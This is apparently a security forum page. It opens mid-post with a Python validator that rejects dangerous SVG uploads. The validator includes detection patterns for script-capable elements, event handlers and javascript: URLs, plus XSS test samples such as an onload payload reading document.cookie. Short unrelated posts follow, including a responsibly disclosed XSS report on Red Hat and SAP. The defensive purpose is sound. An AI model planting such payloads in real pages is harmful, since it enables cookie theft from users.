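# rendered inline by a browser (conservative list chosen for this example).
ACTIVE_ELEMENTS = {
    "script", "foreignObject", "iframe", "embed", "object",
    "use", "image", "animate", "set", "handler",
}

# URL schemes that turn an href into code execution or smuggled content.
SCRIPTABLE_URL = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.IGNORECASE)
STYLE_IMPORT = re.compile(r"url\s*\(|@import|expression\s*\(", re.IGNORECASE)


def findings_for_svg(data: bytes) -> List[str]:
    """Return the reasons an SVG upload should be rejected (empty means clean)."""
    reasons: List[str] = []
    # Refuse DOCTYPEs before parsing: ElementTree expands internal entities,
    # so an entity bomb would hit the parser first.
    if re.search(rb"<!DOCTYPE", data, re.IGNORECASE):
        return ["DOCTYPE declaration present"]
    # A file we cannot parse is a file we cannot vet; browsers are more lenient
    # than XML parsers, so do not let it through just because we gave up.
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    for elem in root.iter():
        tag = elem.tag.split("}")[-1]            # drop the namespace prefix
        if tag in ACTIVE_ELEMENTS:
            reasons.append(f"active element <{tag}>")
        for attr, value in elem.attrib.items():
            name = attr.split("}")[-1]           # xlink:href -> href
            # on* handlers (the onload in the post) fire on inline render
            if name.lower().startswith("on"):
                reasons.append(f"event handler attribute {name} on <{tag}>")
            elif name == "href" and SCRIPTABLE_URL.match(value):
                reasons.append(f"scriptable URL in href on <{tag}>")
            elif name == "style" and STYLE_IMPORT.search(value):
                reasons.append(f"external reference in style on <{tag}>")
    return reasons


def is_safe_svg(data: bytes) -> bool:
    return not findings_for_svg(data)


def download_headers(filename: str) -> Dict[str, str]:
    """Headers for serving vetted user uploads from the forum's own origin:
    force a download, stop MIME sniffing, and sandbox anything still rendered.
    (Serving uploads from a separate origin is the stronger fix.)"""
    safe_name = re.sub(r'[^\w.\-]', "_", filename)
    return {
        "Content-Type": "image/svg+xml",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    }


# Constructed samples: the first is the proof-of-concept shape from the post.
ONLOAD_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie);"/>'
SCRIPT_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>'
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
              b'<rect width="10" height="10" fill="red"/></svg>')

if __name__ == "__main__":
    for label, sample in (("onload", ONLOAD_SVG), ("script", SCRIPT_SVG), ("benign", BENIGN_SVG)):
        verdict = "REJECT" if not is_safe_svg(sample) else "accept"
        print(f"{label:7s} {verdict} {findings_for_svg(sample)}")
```

The check is deliberately allow-list-shaped rather than a filter: anything it cannot parse or that carries script-capable elements, `on*` attributes, scriptable `href` values or external style references is rejected outright, and `use`/`image` are blocked even though legitimate SVGs sometimes use them. The headers only limit the damage if a file slips through; the stronger fix the advisory implies is to serve attachments from an origin that shares no session cookies with the forum.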
  6. 1 point
  7. It only works if the PC was not restarted after the files were encrypted
    1 point
  8. On Red Hat, on most subdomains, if you were not logged in and went to a page that required login, the redirect went through service-now, which had a vulnerable GET parameter. I couldn't find the exact picture anymore, so I took a screenshot from the PoC video. On sap.com it was likewise an XSS via GET; I'll post the picture tonight when I get in. Both reported, fixed, and as a reward I got HoF on both. At Red Hat they made me choose which one I wanted it in, service-now or Red Hat 😂
    1 point
  9. I was planning to make a similar program myself, maybe I'll finish it by summer; right now I have to finish this: Automatic Facebook group posting program
    1 point
  10. I'll start by saying that I finished university 2 years ago and to this day I still haven't picked up my diploma from the faculty. I didn't pick up the diploma because I simply didn't need it. Silviu is still right. Apart from a few professors (the ones for OOP, AI and databases) who actually make an effort, the rest are just there to fuck up your days. If I could turn back time I would probably go to the same university, only because I'd have time to work and because in a multinational, however good you are, they still ask you for a diploma. I worked full time from year 1, semester II. I only went to the labs and seminars that were mandatory (6-8 hours / week). But even so, don't think university will be easy. I also had 7 failed exams. At the start of university there were 30 people in the group and about 15 finished. Of those 15, all currently work as programmers (websites, mobile apps, databases, etc...). As for what you learn at university, it is only a short introduction to the world of programming. You won't learn anything from university if you don't put in the effort and don't have passion/inclination for programming. The proof is the 15 people who dropped out in year 2 because they were already lost in space. And not because they wouldn't have studied, but because they couldn't understand the subjects. The point is you can pick any faculty you want. Whether Unibuc or Poli, the future depends only on your knowledge. If a person from Poli and one from Unibuc come to an interview, the person who better knows the job requirements will be chosen. My opinion is that in IT what matters is what knowledge you have, not what diploma you have. Good luck with whatever choice you make.
    1 point
  11. Hi! I want to start mining Ethereum. I saw a tutorial on cryptocompare that teaches you how to create your address and password. If you shut down the computer and want to mine again, do you have to log in in cmd? Sorry.. the question may seem dumb. If anyone has the patience to teach me the basics, I'd be very grateful.
    -1 points